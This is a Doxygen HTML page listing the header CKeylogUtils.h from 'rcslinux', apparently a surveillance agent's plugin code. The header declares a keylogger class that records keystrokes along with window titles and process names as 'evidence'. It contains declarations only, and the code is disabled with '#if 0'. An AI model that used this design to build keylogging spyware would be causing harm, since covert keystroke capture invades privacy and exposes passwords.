<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.18"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>rcslinux: plugins/CKeylogUtils.h Source File</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/searchdata.js"></script>
<script type="text/javascript" src="search/search.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
 <tbody>
 <tr style="height: 56px;">
  <td id="projectalign" style="padding-left: 0.5em;">
   <div id="projectname">rcslinux
   </div>
  </td>
 </tr>
 </tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.18 -->
<script type="text/javascript">
/* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&amp;dn=gpl-2.0.txt GPL-v2 */
var searchBox = new SearchBox("searchBox", "search",false,'Search');
/* @license-end */
</script>
<script type="text/javascript" src="menudata.js"></script>
<script type="text/javascript" src="menu.js"></script>
<script type="text/javascript">
/* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&amp;dn=gpl-2.0.txt GPL-v2 */
$(function() {
  initMenu('',true,false,'search.php','Search');
  $(document).ready(function() { init_search(); });
});
/* @license-end */</script>
<div id="main-nav"></div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
     onmouseover="return searchBox.OnSearchSelectShow()"
     onmouseout="return searchBox.OnSearchSelectHide()"
     onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>

<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0" 
        name="MSearchResults" id="MSearchResults">
</iframe>
</div>

<div id="nav-path" class="navpath">
  <ul>
<li class="navelem"><a class="el" href="dir_38c8d24aef3972a7f87b834274e76e31.html">plugins</a></li>  </ul>
</div>
</div><!-- top -->
<div class="header">
  <div class="headertitle">
<div class="title">CKeylogUtils.h</div>  </div>
</div><!--header-->
<div class="contents">
<a href="CKeylogUtils_8h.html">Go to the documentation of this file.</a><div class="fragment"><div class="line"><a name="l00001"></a><span class="lineno">    1</span>&#160;<span class="comment">//</span></div>
<div class="line"><a name="l00002"></a><span class="lineno">    2</span>&#160;<span class="comment">// Created by jrf/ht on 16/03/19.</span></div>
<div class="line"><a name="l00003"></a><span class="lineno">    3</span>&#160;<span class="comment">//</span></div>
<div class="line"><a name="l00004"></a><span class="lineno">    4</span>&#160; </div>
<div class="line"><a name="l00005"></a><span class="lineno">    5</span>&#160;<span class="preprocessor">#ifndef RCSLINUX_CKEYLOGUTILS_H</span></div>
<div class="line"><a name="l00006"></a><span class="lineno">    6</span>&#160;<span class="preprocessor">#define RCSLINUX_CKEYLOGUTILS_H</span></div>
<div class="line"><a name="l00007"></a><span class="lineno">    7</span>&#160; </div>
<div class="line"><a name="l00008"></a><span class="lineno">    8</span>&#160;<span class="preprocessor">#include &lt;stdint.h&gt;</span></div>
<div class="line"><a name="l00009"></a><span class="lineno">    9</span>&#160;<span class="preprocessor">#include &lt;unistd.h&gt;</span></div>
<div class="line"><a name="l00010"></a><span class="lineno">   10</span>&#160;<span class="preprocessor">#include &lt;<a class="code" href="IEvidence_8h.html">IEvidence.h</a>&gt;</span></div>
<div class="line"><a name="l00011"></a><span class="lineno">   11</span>&#160; </div>
<div class="line"><a name="l00012"></a><span class="lineno"><a class="line" href="namespaceAgentCore.html">   12</a></span>&#160;<span class="keyword">namespace </span><a class="code" href="namespaceAgentCore.html">AgentCore</a> {</div>
<div class="line"><a name="l00013"></a><span class="lineno">   13</span>&#160;    <span class="keyword">class </span><a class="code" href="classAgentCore_1_1IEvidence.html">IEvidence</a>;</div>
<div class="line"><a name="l00014"></a><span class="lineno">   14</span>&#160;    <span class="keyword">class </span><a class="code" href="classAgentCore_1_1ICore.html">ICore</a>;</div>
<div class="line"><a name="l00015"></a><span class="lineno">   15</span>&#160;}</div>
<div class="line"><a name="l00016"></a><span class="lineno">   16</span>&#160;<span class="comment">// temporarly excluded from build</span></div>
<div class="line"><a name="l00017"></a><span class="lineno">   17</span>&#160;<span class="preprocessor">#if 0</span></div>
<div class="line"><a name="l00018"></a><span class="lineno">   18</span>&#160; </div>
<div class="line"><a name="l00022"></a><span class="lineno">   22</span>&#160;<span class="keyword">namespace </span><a class="code" href="namespaceAgentPluginPrivate.html">AgentPluginPrivate</a> {</div>
<div class="line"><a name="l00026"></a><span class="lineno">   26</span>&#160;<span class="preprocessor">    #define KEYLOG_MAX_KEYS_PER_EVIDENCE     16</span></div>
<div class="line"><a name="l00027"></a><span class="lineno">   27</span>&#160; </div>
<div class="line"><a name="l00064"></a><span class="lineno">   64</span>&#160;<span class="preprocessor">    #define EVIDENCE_TYPE_KEYLOG      0x0040</span></div>
<div class="line"><a name="l00065"></a><span class="lineno">   65</span>&#160; </div>
<div class="line"><a name="l00072"></a><span class="lineno">   72</span>&#160;<span class="preprocessor">    #define KEYLOG_PRIVATE_BUFFER_SIZE (KEYLOG_MAX_KEYS_PER_EVIDENCE * 1024)</span></div>
<div class="line"><a name="l00073"></a><span class="lineno">   73</span>&#160; </div>
<div class="line"><a name="l00078"></a><span class="lineno">   78</span>&#160;    <span class="keyword">class </span>CKeylogUtils {</div>
<div class="line"><a name="l00079"></a><span class="lineno">   79</span>&#160;    <span class="keyword">public</span>:</div>
<div class="line"><a name="l00083"></a><span class="lineno">   83</span>&#160;        <span class="keyword">typedef</span> <span class="keyword">struct </span>_KeylogContext {</div>
<div class="line"><a name="l00084"></a><span class="lineno">   84</span>&#160;            uint8_t* buf; </div>
<div class="line"><a name="l00085"></a><span class="lineno">   85</span>&#160;            <span class="keywordtype">int</span> bufSize; </div>
<div class="line"><a name="l00086"></a><span class="lineno">   86</span>&#160;            <span class="keywordtype">int</span> count; </div>
<div class="line"><a name="l00087"></a><span class="lineno">   87</span>&#160;        } KeylogContext;</div>
<div class="line"><a name="l00088"></a><span class="lineno">   88</span>&#160; </div>
<div class="line"><a name="l00103"></a><span class="lineno">  103</span>&#160;        <span class="keyword">static</span> <span class="keywordtype">int</span> addKeylogEvidence(<a class="code" href="classAgentCore_1_1ICore.html">AgentCore::ICore</a>* core, AgentCore::AgentEvidenceCtx* evdCtx, <span class="keywordtype">void</span>* displayCtx, <span class="keywordtype">void</span> *inputCtx, <span class="keywordtype">void</span> *key, <span class="keywordtype">char</span>** prevProcess, <span class="keywordtype">char</span>** prevTitle);</div>
<div class="line"><a name="l00104"></a><span class="lineno">  104</span>&#160; </div>
<div class="line"><a name="l00111"></a><span class="lineno">  111</span>&#160;        <span class="keyword">static</span> <span class="keywordtype">int</span> flushKeylogEvidenceContext(<a class="code" href="classAgentCore_1_1IEvidence.html">AgentCore::IEvidence</a>* iEvd, AgentCore::AgentEvidenceCtx* evdCtx);</div>
<div class="line"><a name="l00112"></a><span class="lineno">  112</span>&#160; </div>
<div class="line"><a name="l00113"></a><span class="lineno">  113</span>&#160;    <span class="keyword">private</span>:</div>
<div class="line"><a name="l00114"></a><span class="lineno">  114</span>&#160;        <span class="keyword">static</span> <span class="keywordtype">int</span> getKeyName(<span class="keywordtype">void</span>* inputCtx, <span class="keywordtype">void</span>* key, <span class="keywordtype">char</span> *out, <span class="keywordtype">size_t</span> outSize);</div>
<div class="line"><a name="l00115"></a><span class="lineno">  115</span>&#160;        <span class="keyword">static</span> <span class="keywordtype">int</span> initializeNewEvidence(<a class="code" href="classAgentCore_1_1IEvidence.html">AgentCore::IEvidence</a>* iEvd, AgentCore::AgentEvidenceCtx* evdCtx);</div>
<div class="line"><a name="l00116"></a><span class="lineno">  116</span>&#160;        <span class="keyword">static</span> <span class="keywordtype">int</span> addKey(AgentCore::AgentEvidenceCtx *evdCtx, <span class="keywordtype">char</span> *data, <span class="keywordtype">bool</span> addHeader=<span class="keyword">false</span>, <span class="keyword">const</span> <span class="keywordtype">char</span>* wndTitle=<span class="keyword">nullptr</span>, <span class="keyword">const</span> <span class="keywordtype">char</span>* process=<span class="keyword">nullptr</span>);</div>
<div class="line"><a name="l00117"></a><span class="lineno">  117</span>&#160;        <span class="keyword">static</span> <span class="keywordtype">bool</span> mustCreateNewEvidence(AgentCore::AgentEvidenceCtx *evdCtx);</div>
<div class="line"><a name="l00118"></a><span class="lineno">  118</span>&#160;        <span class="keyword">static</span> <span class="keywordtype">void</span> addKeylogHeader(AgentCore::AgentEvidenceCtx *evdCtx, <span class="keyword">const</span> <span class="keywordtype">char</span>* wndTitle, <span class="keyword">const</span> <span class="keywordtype">char</span>* process);</div>
<div class="line"><a name="l00119"></a><span class="lineno">  119</span>&#160;    };</div>
<div class="line"><a name="l00120"></a><span class="lineno">  120</span>&#160;}</div>
<div class="line"><a name="l00121"></a><span class="lineno">  121</span>&#160; </div>
<div class="line"><a name="l00122"></a><span class="lineno">  122</span>&#160;<span class="preprocessor">#endif</span></div>
<div class="line"><a name="l00123"></a><span class="lineno">  123</span>&#160;<span class="preprocessor">#endif //RCSLINUX_CKEYLOGUTILS_H</span></div>
</div><!-- fragment --></div><!-- contents -->
<div class="ttc" id="aclassAgentCore_1_1IEvidence_html"><div class="ttname"><a href="classAgentCore_1_1IEvidence.html">AgentCore::IEvidence</a></div><div class="ttdoc">exposes the evidence manager AgentCorePrivate::CEvidenceManager to the plugins</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00071">IEvidence.h:71</a></div></div>
<div class="ttc" id="aclassAgentCore_1_1ICore_html"><div class="ttname"><a href="classAgentCore_1_1ICore.html">AgentCore::ICore</a></div><div class="ttdoc">exposes the application (agent) context AgentCorePrivate::CAppContext to the plugins</div><div class="ttdef"><b>Definition:</b> <a href="ICore_8h_source.html#l00032">ICore.h:32</a></div></div>
<div class="ttc" id="aIEvidence_8h_html"><div class="ttname"><a href="IEvidence_8h.html">IEvidence.h</a></div></div>
<div class="ttc" id="anamespaceAgentCore_html"><div class="ttname"><a href="namespaceAgentCore.html">AgentCore</a></div><div class="ttdef"><b>Definition:</b> <a href="CKeylogUtils_8h_source.html#l00012">CKeylogUtils.h:12</a></div></div>
<div class="ttc" id="anamespaceAgentPluginPrivate_html"><div class="ttname"><a href="namespaceAgentPluginPrivate.html">AgentPluginPrivate</a></div><div class="ttdef"><b>Definition:</b> <a href="CPluginBase_8h_source.html#l00023">CPluginBase.h:23</a></div></div>
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated by &#160;<a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.18
</small></address>
</body>
</html>
